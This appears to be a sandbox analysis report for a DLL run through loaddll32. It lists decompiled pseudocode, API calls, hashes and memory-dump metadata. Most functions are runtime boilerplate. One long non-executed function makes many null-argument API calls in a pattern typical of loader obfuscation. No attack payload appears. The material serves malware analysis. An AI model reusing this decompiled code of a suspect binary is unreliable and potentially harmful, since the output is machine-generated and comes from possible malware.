0x6e9e948e
0x6e9e948e
0x6e9e9330
0x6e9e9330
0x6e9e9341
0x6e9e9348
0x6e9e934d
0x6e9e935c
0x6e9e9362
0x6e9e9365
0x6e9e937a
0x6e9e9381
0x6e9e938b
0x6e9e938d
0x6e9e938d
0x6e9e9365
0x6e9e9390
0x6e9e9397
0x6e9e939e
0x00000000
0x6e9e93a0
0x6e9e93a5
0x6e9e93a7
0x6e9e93aa
0x6e9e93ac
0x6e9e93b5
0x6e9e93c3
0x6e9e93c9
0x6e9e93c9
0x6e9e93b5
0x6e9e93cb
0x6e9e93d3
0x6e9e93d3
0x6e9e93e5
0x6e9e93e8
0x6e9e93f4
0x6e9e93f4
0x6e9e932a

APIs

__RTC_Initialize.LIBCMT ref: 6E9E9343

Part of subcall function 6E9E9A46: InitializeSListHead.KERNEL32(6E9FD000,6E9E934D,6E9FA5D0,00000010,6E9E92DE,?,?,?,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618), ref: 6E9E9A4B

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E9E93AD

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: be01c6001a90c430601058da48e894e1ed9c6bde63d394e67dce23cafec00db2
Instruction ID: 1f9e2ce47f36c12276604c886fedb7f981b2522d77d978232cdf8bed53d5285e
Opcode Fuzzy Hash: be01c6001a90c430601058da48e894e1ed9c6bde63d394e67dce23cafec00db2
Instruction Fuzzy Hash: 79210232608302EEDB56ABF894107DC73A99FA232DF105889CB416BAC1CB32D585CE65

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EE509 Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E6E9EE509() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x6e9fd638 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x6e9fd418; // 0x1097720
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

0x6e9ee50e
0x6e9ee510
0x6e9ee514
0x6e9ee51d
0x6e9ee528
0x6e9ee538
0x6e9ee53c
0x6e9ee53f
0x6e9ee551
0x6e9ee541
0x6e9ee544
0x6e9ee54d
0x6e9ee546
0x6e9ee549
0x6e9ee549
0x6e9ee544
0x6e9ee553
0x6e9ee55b
0x6e9ee560
0x6e9ee56f
0x6e9ee566
0x6e9ee567
0x6e9ee567
0x6e9ee573
0x6e9ee591
0x6e9ee595
0x6e9ee59c
0x6e9ee5a3
0x6e9ee5a5
0x6e9ee5a8
0x6e9ee5a8
0x6e9ee575
0x6e9ee575
0x6e9ee578
0x6e9ee57e
0x6e9ee589
0x6e9ee58b
0x6e9ee58b
0x6e9ee580
0x6e9ee580
0x6e9ee580
0x6e9ee57e
0x6e9ee530
0x6e9ee530
0x6e9ee530
0x6e9ee5af
0x6e9ee5b0
0x6e9ee5bc

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6E9EE555
GetFileType.KERNELBASE(00000000), ref: 6E9EE567

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d5ad0a26595b0b6625e18536d04ec5161a6ad9d716c7b1ccedf85c44de183492
Instruction ID: e1b60db6946d17d967ac750bd4c211b3b4141225407f1e216efdff3deb871f8e
Opcode Fuzzy Hash: d5ad0a26595b0b6625e18536d04ec5161a6ad9d716c7b1ccedf85c44de183492
Instruction Fuzzy Hash: D411DA71608B424ECF328E7E9C9461A7A999F47230F240B1AD3BBC79F5EB30D5858E50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9ECC7D Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9ECC7D(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x6e9ecc82

APIs

Part of subcall function 6E9EFD93: GetEnvironmentStringsW.KERNEL32 ref: 6E9EFD9C
Part of subcall function 6E9EFD93: _free.LIBCMT ref: 6E9EFDFB
Part of subcall function 6E9EFD93: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9EFE0A

_free.LIBCMT ref: 6E9ECCBD
_free.LIBCMT ref: 6E9ECCC4

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: ae2a62a2f42bd5e921542e9754765cfd8a2d1538a335fa444be36cdf8d165266
Instruction ID: d65021eba81d12dfc8e10144ea42a22640ac40216212b58cf53f6e1c54aeeeff
Opcode Fuzzy Hash: ae2a62a2f42bd5e921542e9754765cfd8a2d1538a335fa444be36cdf8d165266
Instruction Fuzzy Hash: 59E0A02398994049A22316FA794279D1B4D4FD233DB290E16D6508EAC4DBA0C4020D92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EE649 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9EE649(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6E9ED46D(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6e9fd9d8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6E9F0684();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E6E9EC4BB(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x6e9ee64f
0x6e9ee655
0x6e9ee687
0x6e9ee68c
0x6e9ee692
0x00000000
0x6e9ee692
0x6e9ee659
0x6e9ee65b
0x6e9ee65b
0x6e9ee672
0x6e9ee67b
0x6e9ee683
0x00000000
0x00000000
0x6e9ee663
0x6e9ee665
0x00000000
0x00000000
0x6e9ee66e
0x6e9ee670
0x00000000
0x00000000
0x6e9ee670
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,6E9F0272,?,00000000,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7), ref: 6E9EE67B

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a9a6810bffec7b56bcb7ae2705573d172ac353f767a3a28f89010ac6dceb7c40
Instruction ID: 234295da07b709b72a820f3ac5e7ae02516120a83249c55bda4c7447fe6781e3
Opcode Fuzzy Hash: a9a6810bffec7b56bcb7ae2705573d172ac353f767a3a28f89010ac6dceb7c40
Instruction Fuzzy Hash: 38E02B312456156BEB1316F65C1479A3A4C9FD2FA4F0206119F64DAFC0DB61D8008DE9

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E19F0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9E19F0(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v16 = E6E9E2190(__eflags);
				_v8 =  *((intOrPtr*)(E6E9E12B0(_a8)));
				_v12 =  *((intOrPtr*)(E6E9E12B0(_a4)));
				return StrCmpIW(_v12, _v8);
			}

0x6e9e19f6
0x6e9e19fe
0x6e9e1a0c
0x6e9e1a1a
0x6e9e1a2b

APIs

StrCmpIW.KERNELBASE(?,00000000,?,6E9E5D13,?,6E9E5D13,?,00000000,6E9E265E,E463DA3C,?,6E9E5DAA), ref: 6E9E1A25

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
Instruction ID: ae4d4a1caabc2299a6006e19aaaf76a970159217e7d59239d8a9e68517a6b8ba
Opcode Fuzzy Hash: 0f8907e583578c55cdefc4c0f39f8731c7db44550c7d3d73018c5631cd47dc09
Instruction Fuzzy Hash: C5E0C079D04208AFCB05DFE4C84089EB7B8EF99300B108999E6159B300DB34DA409FD4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E9E8630 Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 327
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E6E9E8630(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				long _v12;
				int _v16;
				int _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				int _v44;
				struct HMENU__* _v48;
				intOrPtr _v52;
				int _v56;
				WCHAR* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				int _v72;
				intOrPtr _v76;
				long _v80;
				long _v84;
				long _v88;
				long _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				struct _SID_IDENTIFIER_AUTHORITY* _v120;
				int _v124;
				int _v128;
				int _v132;
				intOrPtr _v136;
				long _v140;
				long _v144;
				void* _v148;
				char _v164;
				void* _t116;
				intOrPtr _t118;
				void* _t180;

				if((E6E9E5D90(__eflags) & 0x000000ff) == 0) {
					L87:
					__eflags = 0;
					return 0;
				}
				_t184 = _a4;
				if(_a4 == 0) {
					goto L87;
				}
				_t116 = E6E9E5910(_t184);
				_t185 = _t116;
				if(_t116 == 0) {
					return 1;
				}
				_t118 = E6E9E7700(_t185);
				if(_t118 == 0) {
					return 1;
				}
				if(_a4 == 2) {
					_v12 = FormatMessageA(0, 0, 0, 0, 0, 0, 0);
					return _a4;
				}
				__eflags = _a4 - 3;
				if(_a4 == 3) {
					_v16 = TextOutW(0, 0, 0, 0, 0);
					return _a4;
				}
				__eflags = _a4 - 4;
				if(_a4 != 4) {
					__eflags = _a4 - 5;
					if(_a4 != 5) {
						__eflags = _a4 - 6;
						if(_a4 != 6) {
							__eflags = _a4 - 7;
							if(_a4 != 7) {
								__eflags = _a4 - 8;
								if(_a4 != 8) {
									__eflags = _a4 - 9;
									if(_a4 != 9) {
										__eflags = _a4 - 0xa;
										if(_a4 != 0xa) {
											__eflags = _a4 - 0xb;
											if(_a4 != 0xb) {
												__eflags = _a4 - 0xc;
												if(_a4 != 0xc) {
													__eflags = _a4 - 0xd;
													if(_a4 != 0xd) {
														__eflags = _a4 - 0xe;
														if(_a4 != 0xe) {
															__eflags = _a4 - 0xf;
															if(_a4 != 0xf) {
																__eflags = _a4 - 0x10;
																if(_a4 != 0x10) {
																	__eflags = _a4 - 0x11;
																	if(_a4 != 0x11) {
																		__eflags = _a4 - 0x12;
																		if(_a4 != 0x12) {
																			__eflags = _a4 - 0x13;
																			if(_a4 != 0x13) {
																				__eflags = _a4 - 0x14;
																				if(_a4 != 0x14) {
																					__eflags = _a4 - 0x15;
																					if(_a4 != 0x15) {
																						__eflags = _a4 - 0x16;
																						if(_a4 != 0x16) {
																							__eflags = _a4 - 0x17;
																							if(_a4 != 0x17) {
																								__eflags = _a4 - 0x18;
																								if(_a4 != 0x18) {
																									__eflags = _a4 - 0x19;
																									if(_a4 != 0x19) {
																										__eflags = _a4 - 0x1a;
																										if(_a4 != 0x1a) {
																											__eflags = _a4 - 0x1b;
																											if(_a4 != 0x1b) {
																												__eflags = _a4 - 1;
																												if(_a4 == 1) {
																													__eflags = _a8;
																													if(_a8 != 0) {
																														__eflags = E6E9E7670();
																														if(__eflags == 0) {
																															_t118 = E6E9E6960(_t180);
																															__eflags = _t118;
																															if(_t118 != 0) {
																																_t118 = E6E9E7770();
																																_v8 = _t118;
																																__eflags = _v8 - 1;
																																if(_v8 == 1) {
																																	__eflags = E6E9E71E0();
																																	if(__eflags == 0) {
																																		_t118 = E6E9E6390(__eflags);
																																	} else {
																																		_t118 = E6E9E6390(__eflags);
																																	}
																																}
																															}
																														} else {
																															_t118 = E6E9E6390(__eflags);
																														}
																													}
																												}
																												__eflags = _a4 - 0x1c;
																												if(_a4 != 0x1c) {
																													__eflags = _a4 - 0x1d;
																													if(_a4 != 0x1d) {
																														__eflags = _a4 - 0x1e;
																														if(_a4 != 0x1e) {
																															__eflags = _a4 - 0x1f;
																															if(_a4 != 0x1f) {
																																__eflags = _a4 - 0x20;
																																if(_a4 != 0x20) {
																																	__eflags = _a4 - 0x21;
																																	if(_a4 != 0x21) {
																																		__eflags = _a4 - 0x22;
																																		if(_a4 != 0x22) {
																																			__eflags = _a4 - 0x23;
																																			if(_a4 != 0x23) {
																																				__eflags = _a4 - 0x24;
																																				if(_a4 != 0x24) {
																																					goto L87;
																																				}
																																				_v148 = DuplicateIcon(0, 0);
																																				return _a4;
																																			}
																																			_v144 = SHStrDupA(0, 0);
																																			return _a4;
																																		}
																																		_v140 = SHStrDupW(0, 0);
																																		return _a4;
																																	}
																																	__imp__CreateMutexExW(0, 0, 0, 0);
																																	_v136 = _t118;
																																	return _a4;
																																}
																																_v132 = IsValidSid(0);
																																return _a4;
																															}
																															_v128 = IsValidAcl(0);
																															return _a4;
																														}
																														_v124 = DisableThreadLibraryCalls(0);
																														return _a4;
																													}
																													_v120 = GetSidIdentifierAuthority(0);
																													return _a4;
																												}
																												__imp__CoTaskMemAlloc(0);
																												_v116 = _t118;
																												return _a4;
																											}
																											__imp__CoCancelCall(0, 0);
																											_v112 = _t118;
																											return _a4;
																										}
																										__imp__CveEventWrite(0, 0);
																										_v108 = _t118;
																										return _a4;
																									}
																									__imp__RpcExceptionFilter(0);
																									_v104 = _t118;
																									return _a4;
																								}
																								_v100 = RevertToSelf();
																								return _a4;
																							}
																							__imp__IsTokenRestricted(0);
																							_v96 = _t118;
																							return _a4;
																						}
																						_v92 = GetProcessId(0);
																						return _a4;
																					}
																					_v88 = GetPriorityClass(0);
																					return _a4;
																				}
																				_v84 = GetVersion();
																				return _a4;
																			}
																			_v80 = GetMessageTime();
																			return _a4;
																		}
																		__imp__UuidCreate(0);
																		_v76 = _t118;
																		return _a4;
																	}
																	_v72 = GetConsoleCP();
																	return _a4;
																}
																__imp__DceErrorInqTextA(0, 0);
																_v68 = _t118;
																return _a4;
															}
															__imp__SHGetThreadRef(0);
															_v64 = _t118;
															return _a4;
														}
														_v60 = CharNextW(0);
														return _a4;
													}
													_v56 = SetFileAttributesW(0, 0);
													return _a4;
												}
												__imp__GetProductInfo(0, 0, 0, 0, 0);
												_v52 = _t118;
												return _a4;
											}
											_v48 = CreatePopupMenu();
											return _a4;
										}
										_v44 = FlattenPath(0);
										return _a4;
									}
									__imp__CoGetCallerTID(0);
									_v40 = _t118;
									return _a4;
								}
								__imp__CoCreateInstance( &_v164, 0, 0,  &_v164, 0);
								_v36 = _t118;
								return _a4;
							}
							__imp__OleInitialize(0);
							_v32 = _t118;
							return _a4;
						}
						__imp__CoInitialize(0);
						_v28 = _t118;
						return _a4;
					}
					_v24 = FormatMessageW(0, 0, 0, 0, 0, 0, 0);
					return _a4;
				} else {
					_v20 = TextOutA(0, 0, 0, 0, 0);
					return _a4;
				}
			}

0x6e9e8643
0x6e9e8a7e
0x6e9e8a7e
0x00000000
0x6e9e8a7e
0x6e9e8649
0x6e9e864d
0x00000000
0x00000000
0x6e9e8653
0x6e9e8658
0x6e9e865a
0x00000000
0x6e9e8a77
0x6e9e8660
0x6e9e8667
0x00000000
0x6e9e8a6e
0x6e9e8671
0x6e9e8687
0x00000000
0x6e9e868a
0x6e9e8692
0x6e9e8696
0x6e9e86a8
0x00000000
0x6e9e86ab
0x6e9e86b3
0x6e9e86b7
0x6e9e86d4
0x6e9e86d8
0x6e9e86f9
0x6e9e86fd
0x6e9e8712
0x6e9e8716
0x6e9e872b
0x6e9e872f
0x6e9e8756
0x6e9e875a
0x6e9e876f
0x6e9e8773
0x6e9e8788
0x6e9e878c
0x6e9e879f
0x6e9e87a3
0x6e9e87c0
0x6e9e87c4
0x6e9e87db
0x6e9e87df
0x6e9e87f4
0x6e9e87f8
0x6e9e880d
0x6e9e8811
0x6e9e8828
0x6e9e882c
0x6e9e883f
0x6e9e8843
0x6e9e8858
0x6e9e885c
0x6e9e886f
0x6e9e8873
0x6e9e8886
0x6e9e888a
0x6e9e889f
0x6e9e88a3
0x6e9e88b8
0x6e9e88bc
0x6e9e88d1
0x6e9e88d5
0x6e9e88e8
0x6e9e88ec
0x6e9e8901
0x6e9e8905
0x6e9e891c
0x6e9e8920
0x6e9e8937
0x6e9e893b
0x6e9e893d
0x6e9e8941
0x6e9e8948
0x6e9e894a
0x6e9e8953
0x6e9e8958
0x6e9e895a
0x6e9e895c
0x6e9e8961
0x6e9e8964
0x6e9e8968
0x6e9e896f
0x6e9e8971
0x6e9e897a
0x6e9e8973
0x6e9e8973
0x6e9e8973
0x6e9e8971
0x6e9e8968
0x6e9e894c
0x6e9e894c
0x6e9e894c
0x6e9e894a
0x6e9e8941
0x6e9e897f
0x6e9e8983
0x6e9e8998
0x6e9e899c
0x6e9e89b1
0x6e9e89b5
0x6e9e89ca
0x6e9e89ce
0x6e9e89e3
0x6e9e89e7
0x6e9e89fc
0x6e9e8a00
0x6e9e8a1b
0x6e9e8a1f
0x6e9e8a36
0x6e9e8a3a
0x6e9e8a51
0x6e9e8a55
0x00000000
0x6e9e8a75
0x6e9e8a61
0x00000000
0x6e9e8a67
0x6e9e8a46
0x00000000
0x6e9e8a4c
0x6e9e8a2b
0x00000000
0x6e9e8a31
0x6e9e8a0a
0x6e9e8a10
0x00000000
0x6e9e8a16
0x6e9e89f1
0x00000000
0x6e9e89f4
0x6e9e89d8
0x00000000
0x6e9e89db
0x6e9e89bf
0x00000000
0x6e9e89c2
0x6e9e89a6
0x00000000
0x6e9e89a9
0x6e9e8987
0x6e9e898d
0x00000000
0x6e9e8990
0x6e9e8926
0x6e9e892c
0x00000000
0x6e9e892f
0x6e9e890b
0x6e9e8911
0x00000000
0x6e9e8914
0x6e9e88f0
0x6e9e88f6
0x00000000
0x6e9e88f9
0x6e9e88dd
0x00000000
0x6e9e88e0
0x6e9e88c0
0x6e9e88c6
0x00000000
0x6e9e88c9
0x6e9e88ad
0x00000000
0x6e9e88b0
0x6e9e8894
0x00000000
0x6e9e8897
0x6e9e887b
0x00000000
0x6e9e887e
0x6e9e8864
0x00000000
0x6e9e8867
0x6e9e8847
0x6e9e884d
0x00000000
0x6e9e8850
0x6e9e8834
0x00000000
0x6e9e8837
0x6e9e8817
0x6e9e881d
0x00000000
0x6e9e8820
0x6e9e87fc
0x6e9e8802
0x00000000
0x6e9e8805
0x6e9e87e9
0x00000000
0x6e9e87ec
0x6e9e87d0
0x00000000
0x6e9e87d3
0x6e9e87af
0x6e9e87b5
0x00000000
0x6e9e87b8
0x6e9e8794
0x00000000
0x6e9e8797
0x6e9e877d
0x00000000
0x6e9e8780
0x6e9e875e
0x6e9e8764
0x00000000
0x6e9e8767
0x6e9e8745
0x6e9e874b
0x00000000
0x6e9e874e
0x6e9e871a
0x6e9e8720
0x00000000
0x6e9e8723
0x6e9e8701
0x6e9e8707
0x00000000
0x6e9e870a
0x6e9e86ee
0x00000000
0x6e9e86b9
0x6e9e86c9
0x00000000
0x6e9e86cc

APIs

Part of subcall function 6E9E5D90: LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6E9E5E5C
Part of subcall function 6E9E5D90: LoadLibraryA.KERNELBASE(?,KERNEL32.dll,00000000), ref: 6E9E5EBF

FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E9E8681
TextOutW.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 6E9E86A2

Strings

$, xrefs: 6E9E8A51

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: LibraryLoad$FormatMessageText
String ID: $
API String ID: 159750934-3993045852
Opcode ID: 113d050dc7a25e89abad7ec237a86c58ac636fee72a297fbde4def6398cbcf50
Instruction ID: 59ff1840f326400d3893ccaa3ab062e28d5638839030e706fb7ed5452b6354da
Opcode Fuzzy Hash: 113d050dc7a25e89abad7ec237a86c58ac636fee72a297fbde4def6398cbcf50
Instruction Fuzzy Hash: E3C1D070A58208FFDF69DFE9D44978C3BB4AF06341F588415FA0AAAA44D770D980CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E9839 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E9E9839(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6E9E9954(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6E9EA330(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6E9EA330(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6E9E9954(_t49);
				}
				return _t49;
			}

0x6e9e9839
0x6e9e9839
0x6e9e9839
0x6e9e984d
0x6e9e984f
0x6e9e9852
0x6e9e9852
0x6e9e9856
0x6e9e985b
0x6e9e9873
0x6e9e9879
0x6e9e987f
0x6e9e9885
0x6e9e988b
0x6e9e9891
0x6e9e9897
0x6e9e989e
0x6e9e98a5
0x6e9e98ac
0x6e9e98b3
0x6e9e98ba
0x6e9e98c1
0x6e9e98c2
0x6e9e98cb
0x6e9e98d1
0x6e9e98d4
0x6e9e98da
0x6e9e98e9
0x6e9e98f5
0x6e9e9900
0x6e9e9907
0x6e9e990e
0x6e9e9919
0x6e9e9921
0x6e9e992a
0x6e9e992c
0x6e9e992f
0x6e9e9931
0x6e9e993b
0x6e9e9943
0x6e9e9949
0x00000000
0x6e9e9950
0x6e9e9953

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E9E9845
IsDebuggerPresent.KERNEL32 ref: 6E9E9911
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E9E9931
UnhandledExceptionFilter.KERNEL32(?), ref: 6E9E993B

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
